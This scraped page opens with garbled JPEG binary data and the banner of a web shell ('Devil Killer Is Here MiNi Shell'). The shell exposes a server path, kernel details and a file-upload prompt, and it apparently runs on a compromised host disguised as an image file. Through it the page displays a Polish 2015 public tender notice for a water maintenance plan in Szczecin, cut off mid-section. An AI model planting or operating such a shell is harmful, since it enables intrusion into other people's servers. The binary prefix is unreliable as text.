JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150522/121812-N-2015.html

<p class="kh_header"><b>Szczecin: opracowanie projektu dokumentu pn.: Plan utrzymania wód obejmujący obszar działania Regionalnego Zarządu Gospodarki Wodnej w Szczecinie wraz z przeprowadzeniem Strategicznej Oceny Oddziaływania na Środowisko dla tego dokumentu.</b><br>
<b>Numer ogłoszenia: 121812 - 2015; data zamieszczenia: 22.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Zarząd Gospodarki Wodnej w Szczecinie , ul. Tama Pomorzańska 13A, 70-030 Szczecin, woj. zachodniopomorskie, tel. 091 4411200, faks 091 4411300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.rzgw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie projektu dokumentu pn.: Plan utrzymania wód obejmujący obszar działania Regionalnego Zarządu Gospodarki Wodnej w Szczecinie wraz z przeprowadzeniem Strategicznej Oceny Oddziaływania na Środowisko dla tego dokumentu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia:
1.1.	CZĘŚĆ A - opracowanie projektu dokumentu pn.: Plan utrzymania wód obejmujący obszar działania Regionalnego Zarządu Gospodarki Wodnej w Szczecinie (zwanego dalej projektem PUW), którego zakres określa ustawa Prawo wodne (zwana dalej ustawą PW) z dnia 18 lipca 2001 r. (tj. z dnia 27 lutego 2015 r. (Dz.U. z 2015 r. poz. 469). art. 114b ust.1 oraz z uwzględnieniem wymogów ust.2 ww. art.)
1)	Zadanie  AI:    Opracowanie projektu PUW
2)	Zadanie AII: Uzgodnienie projektu PUW z Prezesem Krajowego Zarządu Gospodarki Wodnej oraz właściwymi marszałkami województw.

1.2.	CZĘŚĆ B - przeprowadzenie procedury strategicznej oceny oddziaływania na środowisko dla projektu PUW
1)	Zadanie BI: sporządzenie projektu prognozy oddziaływania na środowisko dla projektu PUW;
2)	Zadanie BII: opracowanie metodyki prowadzenia monitoringu skutków realizacji postanowień PUW, zawierającej m.in. szczegółowe określenie instytucji/osób, które zobowiązane byłyby dostarczać wykorzystywane dla potrzeb tego monitoringu informacje 
i dane wraz podaniem podstaw prawnych egzekwujących realizacje tych zobowiązań; 
3)	Zadanie BIII: 
a)	uzyskanie opinii właściwych organów i przedstawienie - w formie pisemnej - propozycji uwzględnienia tych opinii w projekcie PUW i prognozie oddziaływania tego dokumentu na środowisko;
b)	zorganizowanie i przeprowadzenie jednego spotkania konsultacyjnego w ramach zapewnienia udziału społeczeństwa w postępowaniu w sprawie strategicznej oceny oddziaływania na środowisko projektu PUW i prognozy oddziaływania tego dokumentu na środowisko;
c)	przedstawienie - w formie pisemnej - propozycji sposobu uwzględnienia w projekcie PUW 
i prognozie oddziaływania tego dokumentu uwag i wniosków zgłoszonych w ramach udziału społeczeństwa;
4)	Zadanie BIV: opracowanie ostatecznej wersji prognozy oddziaływania na środowisko projektu PUW. Przeprowadzenie strategicznej oceny oddziaływania na środowisko wraz 
z prognozą oddziaływania na środowisko dla projektu PUW jest niezbędne dla przygotowania i opublikowania tego dokumentu jako rozporządzenia Dyrektora RZGW w Szczecinie. Obowiązek realizacji takiego zadania nakłada na dyrektora rzgw art. 114b ustawy PW. Zgodnie z art. 114b ust 3 ustawy PW dyrektor rzgw przyjmując plan utrzymania wód (PUW) zapewnia możliwość udziału społeczeństwa na zasadach i w trybie określonych w ustawie OOŚ. 

2.	Szczegółowy opis przedmiotu zamówienia.

2.1.	CZĘŚĆ A - opracowanie projektu PUW celem wydania go przez Dyrektora RZGW w Szczecinie jako rozporządzenia w drodze aktu prawa miejscowego.
1)	Zadanie AI: Opracowanie projektu PUW zgodnie z zakresem dla planu utrzymania wód określonym 114b ust.1 ustawy PW oraz uwzględnieniem potrzeb z zakresu ochrony przed powodzią; konieczności osiągnięcia celów środowiskowych i ochrony wód oraz przesłanek dopuszczalności nieosiągnięcia dobrego stanu ekologicznego oraz niezapobieżenia pogorszeniu stanu ekologicznego oraz dobrego potencjału ekologicznego, o których mowa w art. 38j ust. 1 ustawy PW.
a.	Wykonanie dokumentacji na potrzeby opracowania projektu PUW.
a)	Weryfikacja tabel 1, 2 i 3, o których mowa w pkt 7 ppkt 1) pod kątem zgodności z art. 114b ust. 1. ustawy PW, Wzory tabel stanowią Załącznik A.
b)	Wykonanie opracowania, zawierającego opis sposobu uwzględnienia w projekcie PUW wymagań art. 114b ust. 2 ustawy PW, w tym: potrzeb z zakresu ochrony przed powodzią; konieczności osiągnięcia celów środowiskowych i ochrony wód oraz przesłanek dopuszczalności nieosiągnięcia dobrego stanu ekologicznego oraz niezapobieżenia pogorszeniu stanu ekologicznego oraz dobrego potencjału ekologicznego, o których mowa w art. 38j ust. 1. - w podziale na jednolite części wód powierzchniowych (JCWP). 
Prace wskazane w projekcie PUW pogrupowane zostaną zgodnie z art. 22 ust. 1b. Dla każdej z grup wykonany będzie opis dot. sposobu i częstotliwości ich realizacji. Przeprowadzona zostanie analiza (wraz z uzasadnieniem) konieczności realizacji tych robót z uwzględnieniem spodziewanych efektów oraz przewidywanych skutków nie wykonania ww. prac - w odniesieniu do JCWP, w obrębie których planowane jest ich prowadzenie.
c)	Wykonanie warstw numerycznych w formacie Shapefile w układzie współrzędnych płaskich prostokątnych PL-1992 zawierających obiekty i atrybuty w zakresie określonym przez tabele 1, 2, 3, o których mowa w pkt 7 ppkt 1), niezbędne do przeprowadzenia analiz przestrzennych na potrzeby sporządzenia projektu prognozy oddziaływania tego dokumentu na środowisko.
d)	Opracowanie metadanych dla wykonanych warstw numerycznych, zgodnie z profilem INSPIRE w formacie XML.
e)	Opracowanie bazy danych przestrzennych dla projektu PUW, tj. geobazy osobistej lub plikowej w formacie zgodnym z ArcGIS for Desktop 10.2 zawierającej wykonane warstwy numeryczne (wraz z metadanymi) i tabele, a także wszystkie przekazane przez Zamawiającego dane (warstwy numeryczne i tabele). Dla warstw numerycznych Wykonawca utworzy tam gdzie będzie to konieczne aliasy i domeny. 
f)	Wykonanie kompozycji mapowych w formacie MXD zgodnym z ArcGIS for Desktop 10.2 w zakresie i skali pozwalającej na zobrazowanie wszystkich informacji zawartych w projekcie PUW. Kompozycje mapowe muszą zostać opracowane na podstawie wykonanej bazy danych przestrzennych. Dla opracowanych kompozycji mapowych wymagane jest wykonanie eksportu do formatów JPG i PDF w rozdzielczości nie mniejszej niż 300 DPI.
b.	Sporządzenie projektu rozporządzenia Dyrektora Regionalnego Zarządu Gospodarki Wodnej w Szczecinie w sprawie PUW wraz z wymaganymi załącznikami i uzasadnieniem.
c.	Wykonawca opracuje ostateczną wersję projektu PUW uwzględniającą opinie właściwych organów oraz wyniki rozpatrzonych uwag i wniosków zgłoszonych w ramach przeprowadzonych konsultacji społecznych.

2)	Zadanie AII: Uzgodnienie projektu PUW z Prezesem Krajowego Zarządu Gospodarki Wodnej oraz właściwymi terenowo marszałkami województw zgodnie z 114b ust.4 ustawy PW;

2.2.	CZĘŚĆ B - w zakresie przeprowadzenia procedury oceny oddziaływania na środowisko dla projektu PUW.

1)	Zadanie BI: Sporządzenie projektu prognozy oddziaływania na środowisko dla projektu PUW.
a.	Prognoza oddziaływania na środowisko powinna być opracowana zgodnie z wymogami art. 51 ust 2 i art. 52 ust 1 i 2 ustawy OOŚ oraz uzgodnieniami zakresu i stopnia szczegółowości informacji wymaganych w prognozie oddziaływania na środowisko dokonanymi przez Zamawiającego, na podstawie art. 53 ustawy OOŚ:
a)	z Generalnym Dyrektorem Ochrony Środowiska (pismo GDOŚ z dnia 3 kwietnia 2015 r., znak: DOOŚsoos.4116.2015.JP - Załącznik B),
b)	z Głównym Inspektorem Sanitarnym (pismo GIS z dnia 8 kwietnia 2015 r., znak: GIS-HŚ-NS-4311-38/EN/15 - Załącznik C),
b.	Prognoza oddziaływania na środowisko powinna określać wpływ realizacji ustaleń PUW na stan wód, ekosystemów od wód zależnych i obszarów chronionych wyznaczonych na podstawie art. 113 ust. 4 ustawy PW oraz na stan i funkcjonowanie obszarów podlegających ochronie na podstawie ustawy z dnia 16.04.2004 r. o ochronie przyrody (Dz. U. z 2013 r. poz. 627 z późn. zm).
c.	Sporządzona przez Wykonawcę prognoza oddziaływania na środowisko powinna 
w szczególności: 
a)	zawierać:
1.	informacje o zawartości, głównych celach projektu PUW oraz ich powiązaniach z innymi dokumentami. Prognoza powinna być ściśle powiązana z PUW i uwzględniać wszystkie istotne z punktu widzenia środowiska uwarunkowania ich realizacji, 
2.	informacje o metodach zastosowanych przy sporządzaniu prognozy - oprócz właściwego doboru źródeł, narzędzi pozyskiwania i przetwarzania danych, niezwykle istotne jest zachowanie logicznego, spójnego układu całego dokumentu oraz zgodnych ze sobą danych w nim przedstawionych. Należy bezwzględnie przestrzegać zasad podawania źródeł wykorzystywanych danych. W przypadku niejednoznacznych danych, należy wnikliwie zbadać i opisać przyczyny niejednoznaczności, lub, jeżeli nie jest to możliwe, nie posługiwać się tymi danymi, 
3.	informacje o możliwym transgranicznym oddziaływaniu na środowisko projektu PUW - informacje te muszą uwzględniać możliwość i zakres transgranicznego oddziaływania na środowisko, w tym zasięg przestrzenny i charakter przewidywanych oddziaływań oraz identyfikację ewentualnych konfliktów i propozycje ich rozwiązań,
4.	streszczenie sporządzone w języku niespecjalistycznym - streszczenie powinno być zrozumiałe oraz powinno zawierać obrazowe prezentacje graficzne (schematy, mapy) najistotniejszych zjawisk. Nie jest dopuszczalne zamieszczanie w charakterze streszczenia wybranych wycinków dokumentów, 
5.	w przypadku stwierdzenia możliwości znaczącego transgranicznego oddziaływania na środowisko na skutek realizacji PUW - sporządzenie w języku niemieckim skróconych wersji projektu PUW i prognozy ich oddziaływania na środowisko, umożliwiających stronie niemieckiej dokonanie oceny tego oddziaływania;
b)	określać, analizować i oceniać: 
1.	istniejący stan środowiska oraz potencjalne zmiany tego stanu w przypadku braku realizacji PUW - w opisie stanu środowiska należy tez uwzględnić stan wyjściowy, 
z którym w przyszłości będą porównywane oceny stanu realizacji ustaleń warunków,
2.	stan środowiska na obszarach objętych przewidywanym znaczącym oddziaływaniem wynikającym z ustaleń PUW, 
3.	istniejące problemy ochrony środowiska istotne z punktu widzenia realizacji postanowień PUW, w szczególności dotyczące obszarów podlegających ochronie na podstawie ustawy 
z dnia 16 kwietnia 2004 r. o ochronie przyrody oraz dotyczące obecnego stanu wód, ekosystemów od wód zależnych i obszarów chronionych wyznaczonych na podstawie art. 113 ust 4 ustawy PW,
4.	cele ochrony środowiska ustanowione na szczeblu międzynarodowym, wspólnotowym 
i krajowym, istotne z punktu widzenia PUW, oraz sposoby, w jakich te cele i inne problemy środowiska zostały uwzględnione podczas opracowywania dokumentu, w tym w szczególności cele środowiskowe ustalone w Planie gospodarowania wodami na obszarze dorzecza Odry, 
5.	przewidywane znaczące oddziaływania, w tym oddziaływania bezpośrednie, pośrednie, wtórne, skumulowane, krótkoterminowe, średnioterminowe i długoterminowe, stałe 
i chwilowe oraz pozytywne i negatywne, na cele i przedmiot ochrony obszaru Natura 2000 oraz integralność tego obszaru, a także na środowisko, a w szczególności na: 
- różnorodność biologiczną, 
- ludzi, 
- zwierzęta, 
- rośliny, 
- wodę, 
- powietrze, 
- powierzchnię ziemi, 
- krajobraz, 
- klimat, 
- zasoby naturalne, 
- zabytki, 
- dobra materialne 
z uwzględnieniem zależności między tymi elementami środowiska i między oddziaływaniami na te elementy; 
c)	przedstawiać: 
1.	rozwiązania mające na celu zapobieganie, ograniczanie lub kompensację przyrodniczą negatywnych oddziaływań na środowisko, mogących być rezultatem realizacji warunków, w szczególności na cele i przedmiot ochrony obszaru Natura 2000 oraz integralność tego obszaru - powinny to być konkretne propozycje, dotyczące zidentyfikowanych, konkretnych sytuacji konfliktowych, 
2.	biorąc pod uwagę cele i geograficzny zasięg obowiązywania PUW oraz cele i przedmiot ochrony obszaru Natura 2000 oraz integralność tego obszaru - rozwiązania alternatywne do rozwiązań zawartych w PUW wraz z uzasadnieniem ich wyboru oraz opis metod dokonania oceny prowadzącej do tego wyboru albo wyjaśnienie braku rozwiązań alternatywnych, w tym wskazania napotkanych trudności wynikających z niedostatków techniki lub luk we współczesnej wiedzy.
d.	Przedstawione w powyższych punktach zagadnienia należy analizować w aspekcie celów, dla których zostają ustalane PUW, a przewidywane znaczące oddziaływania zarówno pozytywne jak i negatywne należy w szczególności odnosić w kontekście wpływu na zmianę stanu wód, ekosystemów od wód zależnych i obszarów chronionych wyznaczonych na podstawie art. 113 ust 4 ustawy PW oraz ryzyka nieosiągnięcia celów środowiskowych w perspektywie roku 2021 oraz 2027.
e.	Dodatkowo, w przeprowadzonych analizach, ocenach potencjalnych skutków dla środowiska oraz rekomendowanych rozwiązaniach Wykonawca powinien uwzględnić zagadnienia wynikające z możliwości pojawienia się w wyniku ustaleń PUW potencjalnych konfliktów społecznych i gospodarczych oraz zaproponować działania, które będą możliwe do realizacji w celu ich złagodzenia.
f.	W prognozie Wykonawca zawrze analizy przestrzenne oceny istniejącego stanu środowiska, istniejących problemów środowiska oraz zidentyfikowanych konfliktów w formie załączników mapowych.
g.	Informacje zawarte w prognozie oddziaływania na środowisko, Wykonawca powinien opracować zgodnie ze stanem współczesnej wiedzy i metod oceny wpływu na środowisko, 
w tym w szczególności na stan wód, ekosystemów od wód zależnych oraz obszarów chronionych oraz stosownie do zawartości i stopnia szczegółowości projektu PUW oraz etapu przyjęcia tego dokumentu w procesie opracowania projektów dokumentów z nim powiązanych. 
h.	Projekt prognozy oraz każda z wersji prognozy oddziaływania na środowisko dla projektu PUW przedstawiane Zamawiającemu, powinny spełniać wszystkie wymagania dotyczące realizacji zamówienia. 

2)	Zadanie BII: Opracowanie metodyki prowadzenia monitoringu skutków realizacji postanowień PUW. Propozycje dotyczące przewidywanych metod (w tym narzędzi) analizy skutków realizacji postanowień projektu PUW oraz częstotliwości jej przeprowadzania powinny być ściśle powiązane z celami PUW i uwarunkowaniami ich realizacji oraz w jak największym stopniu uwzględniać możliwość wykorzystania w analizach publicznie dostępnych zbiorów danych.
Opracowane przez Wykonawcę metodyki prowadzenia monitoringu skutków realizacji postanowień PUW powinny zawierać co najmniej:
a.	zestawienie wskaźników stopnia realizacji postanowień PUW, z podaniem szczegółowych ich charakterystyk oraz proponowanej dla poszczególnych wskaźników skali ocen,  
b.	zestawienie wskaźników skuteczności postanowień PUW, z podaniem szczegółowych ich charakterystyk oraz proponowanej dla poszczególnych wskaźników skali ocen,  
c.	zakres informacji i danych dla potrzeb prowadzenia przedmiotowego monitoringu, 
d.	szczegółowe określenie częstotliwości, form oraz sposobów przekazywania ww. informacji 
i danych, 
e.	wykaz instytucji/osób, które zobowiązane byłyby dostarczać przedmiotowe dane i informacje wraz podaniem podstaw prawnych egzekwujących realizację tych zobowiązań. 

3)	Zadanie BIII: Konsultacje społeczne i uzgodnienia opracowanych projektów prognozy 
i PUW. 
W ramach niniejszego zadania Wykonawca zobowiązany jest do realizacji poniższych działań:
a.	uzyskanie opinii właściwych organów odnośnie opracowanych projektów prognozy i PUW. Biorąc pod uwagę, iż planowana realizacja dokumentu obejmuje obszar trzech województw organem właściwym w sprawie opiniowania i uzgadniania w sprawie strategicznej oceny oddziaływania na środowisko jest Generalny Dyrektor Ochrony Środowiska oraz Główny Inspektor Sanitarny;  
b.	zorganizowanie i przeprowadzenie 1 spotkania konsultacyjnego w ramach zapewnienia udziału społeczeństwa w postępowaniu w sprawie strategicznej oceny oddziaływania na środowisko projektów PUW i prognozy oddziaływania - zgodnie z wymaganiami szczegółowymi określonymi przez Zamawiającego w Załączniku D do opisu przedmiotu zamówienia zawartego w niniejszym druku. 
c.	przeprowadzenie ww. spotkania konsultacyjnego przez wskazane z grona specjalistów wykonujących zamówienie osoby - w zakresie prezentacji poddawanych konsultacjom dokumentów, moderowania oraz podsumowania tych spotkań - zgodnie z wymaganiami szczegółowymi określonymi przez Zamawiającego w Załączniku D niniejszego druku;
d.	przedstawienie - w formie pisemnej - propozycji uwzględnienia opinii właściwych organów 
w projektach PUW i prognozy oddziaływania tego dokumentu;
e.	opracowanie uwag i wniosków zgłoszonych w ramach konsultacji społecznych oraz przedstawienie - w formie pisemnej - propozycji sposobu ich uwzględnienia w projektach PUW i prognozy oddziaływania tego dokumentu.

4)	Zadanie BIV: Opracowanie ostatecznej wersji prognozy oddziaływania na środowisko dla projektu PUW
a.	Wykonawca opracuje ostateczną wersję prognozy oddziaływania na środowisko projektu PUW uwzględniającą opinie właściwych organów oraz wyniki rozpatrzonych uwag 
i wniosków zgłoszonych w ramach przeprowadzonych konsultacji społecznych. 
b.	Na opracowanie końcowe ostatecznej wersji prognozy oddziaływania na środowisko składać się będzie: część opisowa oraz część graficzna.
c.	Część opisowa musi zawierać wszystkie elementy określone w punkcie 2.2. CZĘŚĆ B ppkt 1) lit. c. - f. szczegółowego opisu przedmiotu zamówienia. 
d.	Część graficzna opracowania końcowego powinna zawierać mapy w formacie JPG i PDF ilustrujące zjawiska o charakterze przestrzennym oraz ich interakcje. Dla każdej mapy wymagana jest osobna kompozycja mapowa w formacie MXD zgodnym z ArcGIS for Desktop 10.2 (projekt mapy w skali 1: 50 000 oraz warstwy wektorowe). Kompozycje mapowe muszą zostać opracowane na podstawie wykonanej bazy danych przestrzennych.
e.	Baza danych przestrzennych, tj. geobaza osobista lub plikowa w formacie zgodnym z ArcGIS for Desktop 10.2, która musi zawierać odnoszące się do obszaru opracowania warstwy przestrzenne, przekazane przez Zamawiającego i lub utworzone w wyniku realizacji niniejszego zamówienia. Dla warstw numerycznych Wykonawca utworzy tam gdzie będzie to konieczne aliasy i domeny.

3.	Kontrola postępu realizacji zamówienia.
1)	Wykonawca zobowiązany jest do przedstawienia lub udostępnienia Zamawiającemu wykonanych elementów zamówienia i udziału w spotkaniach z Zamawiającym, zgodnie z harmonogramem realizacji zamówienia sporządzonym przez Wykonawcę i zatwierdzonym przez Zamawiającego. 
2)	Zamawiający wymaga, by wskazani w ofercie Wykonawcy eksperci uczestniczyli osobiście 
w spotkaniach  z Zamawiającym dotyczących elementów zamówienia, w których realizacji uczestniczyli oraz złożyli własnoręczne podpisy na elementach dokumentacji - w przygotowaniu których uczestniczyli. W przypadku braku na spotkaniu ekspertów, o których mowa powyżej, Zamawiający może uznać, że spotkanie się nie odbyło. 
3)	Zamawiający może zgłosić uwagi do przedstawionych lub udostępnionych przez Wykonawcę wykonanych elementów zamówienia, w terminie ustalonym na spotkaniu, o którym mowa w pkt. 1) lub w terminie sześciu dni roboczych od dnia udostępnienia Zamawiającemu wykonanych elementów zamówienia.
4)	Wykonawca w terminie ustalonym na spotkaniu, o którym mowa w pkt. 1) lub w terminie pięciu dni od dnia zgłoszenia przez Zamawiającego uwag do wykonanych elementów zamówienia uwzględnia uwagi (w całości lub w części) lub odrzuca uwagi (w całości lub w części) oraz udostępnia Zamawiającemu zmodyfikowane elementy zamówienia wraz z uzasadnieniem odrzucenia uwag.
5)	Zamawiający może zgłosić Wykonawcy uwagi do udostępnionych przez Wykonawcę zmodyfikowanych elementów zamówienia, w terminie sześciu dni roboczych od dnia udostępnienia Zamawiającemu zmodyfikowanych elementów zamówienia.
6)	W przypadku gdy Zamawiający uzna, iż w zmodyfikowanych elementach zamówienia zgłoszone przez niego uwagi nie zostały uwzględnione w sposób prawidłowy bądź nie zaakceptuje uzasadnienia odrzucenia zgłoszonych uwag, zawiadomi o tych okolicznościach Wykonawcę. 
W zawiadomieniu tym będzie zawarte uzasadnienie.
7)	Wszelkie zmiany w składzie osobowym Zespołu wykonującego zamówienie w stosunku do wykazanego w ofercie są możliwe jedynie pod warunkiem zachowania wymogów dotyczących potencjału kadrowego Wykonawcy, określonych w niniejszej specyfikacji. Zmiany, o których mowa powyżej wymagają pisemnej akceptacji Zamawiającego.

4.	Odbiór Zadań
4.1.	Terminy odbioru poszczególnych Zadań.
Wykonawca zobowiązuje się wykonać Zadania od AI do BIV stanowiące przedmiot zamówienia 
i zaoferować Zamawiającemu utwory będące rezultatem ich realizacji do odbioru, w następujących terminach:

4.1.1.	CZĘŚĆ A
1)	Zadanie AI - 4 tygodnie od podpisania umowy.,
2)	Zadanie AII - do dnia 30 listopada 2015 r.,

4.1.2.	CZĘŚĆ B
1)	Zadanie BI - do dnia 14 sierpnia 2015 r.,
2)	Zadanie BII - do dnia 11 września 2015 r.,
3)	Zadanie BIII - do dnia 30 września 2015 r.,
4)	Zadanie BIV - do dnia 15 października 2015 r.

4.2.	Zasady odbioru poszczególnych Zadań.

1)	Odbiór każdego z wykonanych Zadań przez Zamawiającego, stwierdzony zostanie oddzielnym protokołem podpisanym przez przedstawicieli stron umowy.
2)	Odbiór Zadania AII przez Zamawiającego jest równoznaczny z wykonaniem przez Wykonawcę całości przedmiotu zamówienia.
3)	Odbiór wykonanego zadania i podpisanie protokołu stwierdzającego ten odbiór przez Zamawiającego, nastąpi w terminie czternastu dni licząc od dnia zaoferowania Zamawiającemu do odbioru wykonanego Zadania.
4)	Zamawiający może zgłosić Wykonawcy uwagi do wykonanego Zadania, przed upływem terminu odbioru; do zachowania terminu przez Zamawiającego wystarczy wysłanie uwag do Wykonawcy pocztą elektroniczną albo faxem.
5)	Wykonawca w terminie siedmiu dni od dnia zgłoszenia przez Zamawiającego uwag do wykonanego Zadania uwzględnia uwagi (w całości lub w części) lub odrzuca uwagi (w całości lub w części) oraz dostarcza Zamawiającemu do jego siedziby wszystkie utwory będące rezultatem jego realizacji wraz 
z uzasadnieniem odrzucenia uwag.
6)	W przypadku zgłoszenia przez Zamawiającego uwag do wykonanego Zadania, odbiór wykonanego Zadania i podpisanie protokołu stwierdzającego ten odbiór nastąpi w terminie czternastu dni od otrzymania przez Zamawiającego wszystkich utworów będących rezultatem jego realizacji wraz 
z uzasadnieniem odrzucenia zgłoszonych uwag, chyba że Zamawiający uzna, że w otrzymanych utworach będących rezultatem realizacji Zadania zgłoszone przez niego uwagi nie zostały uwzględnione w sposób prawidłowy bądź nie zaakceptuje uzasadnienia odrzucenia zgłoszonych uwag i zawiadomi o tych okolicznościach Wykonawcę przed upływem terminu do jego odbioru; do zachowania terminu przez Zamawiającego wystarczy, wysłanie zawiadomienia do Wykonawcy pocztą elektroniczną lub faxem. 

5.	Forma przedłożenia do odbioru zakończonych Zadań.

5.1.	Wyniki pracy zostaną przedstawione:
5.1.1.	CZĘŚĆ A: 
1)	Zadanie AI - w postaci opracowania w wersji papierowej i elektronicznej - 5 egzemplarzy 
w formie wydruku oraz 2 egzemplarze w formie elektronicznej (na płycie CD/DVD). W formie elektronicznej wszystkie dokumenty powinny być umieszczone w wersji edytowalnej 
(w formacie DOC/DOCX, a także plików DWG i SHP) oraz w plikach PDF, które zawierają dokumenty w postaci identycznej z wydrukami, tj. zawierają wszystkie podpisy oraz pieczęcie. Wersja elektroniczna opracowania musi zawierać wykonaną bazę danych przestrzennych.  Kompozycje mapowe powinny być przygotowane w formatach JPG i PDF i przystosowane do wydruku na arkuszach A2 w skali pomiędzy 1: 25 000 a 1:50 000.
2)	Zadanie AII - w postaci zebranych odrębnych dokumentacji zawierających wszelką korespondencję uzgodnieniową dla każdego organu osobno + skany tejże dokumentacji 
w formacie PDF (na płycie CD/DVD).

5.1.2.	CZĘŚĆ B:
